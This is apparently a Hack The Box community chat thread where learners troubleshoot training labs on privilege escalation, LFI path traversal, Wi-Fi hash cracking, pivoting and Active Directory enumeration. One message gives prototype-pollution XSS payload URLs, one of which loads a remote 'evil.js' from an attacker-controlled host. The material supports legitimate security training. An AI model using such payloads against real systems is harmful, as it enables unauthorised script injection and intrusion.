Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Making a botnet is illegal though
Hi all. I am at the logrotate section of the Linux Privilege Escalation CPTS module and managed to trigger log rotation and get the flag with logrotten. I am still "stuck" however, as I don't really understand the why of why it worked, and I always make it a priority to not walk away from a section if I can't answer that question. If anyone who does has some free time, would you mind reaching out to me via DM to have a conversation? Thank you! 🙂
Read the docs https://github.com/whotwagner/logrotten
Its a race condition
i'm doing the Shells & Payloads skill assessment. I need to visit the website for the first host but there is no browser available on the foothold... There is only tor but we need to install it and we have no access to internet
do you have an idea ? (we can't visit the website from the pwnbox because its not in the same vlan)
You can start the browser through the terminal
Hello everyone I'm doing DACL Attacks II Skills assessment and I'm trying to use gettgtpkinit.py but I keep getting this error message
<SNIP>
i.py", line 44, in <module>
raise LibraryNotFoundError('Error detecting the version of libcrypto')
oscrypto.errors.LibraryNotFoundError: Error detecting the version of libcrypto
How on earth do I fix this? (I'm also using Pwnbox)
can someone teach me about Whitelist Filters on file uploads ? i'm stuck in here
Looks like you need to install it.
https://github.com/wbond/oscrypto
Do you feel the section content isn't enough or are you just stuck in the lab?
Just stuck
You can DM and I can give you some things to think about.
hello everyone - do we know if there will be android pentesting certificate?
Hello guys, I need help for client-side-prototype-pollution exercise.
I have a locally working XSS payloads like these:
||http://94.237.57.115:55298/profile.php?__proto__[src][]=data:,alert(1)//
And
http://94.237.57.115:55298/profile.php?__proto__[src][]=http://127.0.0.1/evil.js ||
But when I try to trigger the admin for example to fetch or doing a request to my python server I don't get any request back.
For example I tried sending this to admin:
||/profile.php?__proto__[src][]=http://MY-KALI-IP/evil.js||
and I had zero coming requests.
Hello, someone could help me on the skill assessments of the 'Wi-Fi Password Cracking Techniques' module? im totally stuck at the beginning and its kind of frustrating
Could ask that during the next cube talk and potentially get an answer.
If you have already captured the handshake, then the next step is to identify the device
like with /var/lib/ieee-data/oui.txt or wpspin?
try and see
i succeeded ty, for the second one i'm using what i learned before trying to crack the hash of the handshake using already existing rules from hashcat and rockyou, but it doesn't seem to work after long time, so idk if im missing something
there are available rule files (rules) on the target in the /opt directory
oh ty didn't see at all, happy to see i was on the good way, cracked it in 1 sec
hi, i'm trying to do the very first question in local file inclusion but i'm confused... what i believe is the correct solution causes the page to load forever instead. is this a bug in the module or am i just doing it wrong?
sry to disturb you again, but for the enterprise one, i did the technique i learned and, i got a "Valid credential" message with name and password, but when i copy paste the password it seems like its not the good one, is it normal?
If its a reverse shell, check your listener
finally on a second iteration it didn't show as valid credential, so now im waiting for maybe find the good credentials
it's not at all
it's just path traversal to read /etc/passwd
i was able to do path traversal up two levels but once i hit (presumably) /var it begins loading infinitely
i'm convinced that this issue is a bug in the module since i just did the next task in the module and it was successful
Problem: I can’t make the nmap static binary work.
Guys, I am doing AEN and I read the section that suggests transferring an nmap static binary. I spent a few hours last night trying to make it work, but it didn’t. Can someone help?
Any HTB Staff available for VPN help? please @ with responses
Please reach out to support
Ty
Hello ! I am in pivoting module , in dynamic port forwarding section and I do the dynamic port forwarding as shown in the course but when I try to connect to the target using proxychains xfreerdp I get error about Kerberos and then proxychains timed out
This is pertaining to the metasploit module in the cpts path. I got the shell, but something strange happened that I havent seen in metasploit before where I executed the exploit and it gave me "exploit aborted due to failure: unexpected reply: the server replied to the trigger in an unexpected way. Exploit completed but no session was created." Then it tells me after closing that dialog that a shell session was opened with the target. Is it common to get a sort of "delay" in metasploit when it pertains to shells? I would post screenshots but I believe it would expose the answer to the module. Just know that I got the shell session opened output on the same line as my prompt, not in the output of my exploit
hi
i am newbie
i am from VietNam
hmmmm russian username, from "VietNam"
Active Directory LDAP > Skills Assessment
Question
What is the name of the computer that starts with RD? (Submit the FQDN in all capital letters)
My Command
Get-ADComputer -Filter "Name -like 'RD*'"
Output
DistinguishedName : CN=RDS01,CN=Computers,DC=INLANEFREIGHTENUM1,DC=LOCAL
DNSHostName :
Enabled : True
Name : RDS01
ObjectClass : computer
ObjectGUID : c6d31ef7-5584-4ba3-ad91-40d98e872ebb
SamAccountName : RDS01$
SID : S-1-5-21-1572947012-227590625-1650757115-1803
UserPrincipalName :
I tried RDS01, RDS01.INLANEFREIGHT.LOCAL, CN=RDS01,CN=Computers,DC=INLANEFREIGHTENUM1,DC=LOCAL, and RDS01$.
None of them worked.
Any help would be appreciated.
is there a subdomain?
I just tried three more things
RDS01$.INLANEFREIGHT.LOCAL, INLANEFREIGHT\RDS01, and INLANEFREIGHT.LOCAL\RDS01.
Still nothing worked.
LOL nevermind.
I just noticed that the domain is not INLANEFREIGHT but INLANEFREIGHTENUM1.
I was looking at that right now too
i was thinking it had to be a FQDN problem
because you were for sure right

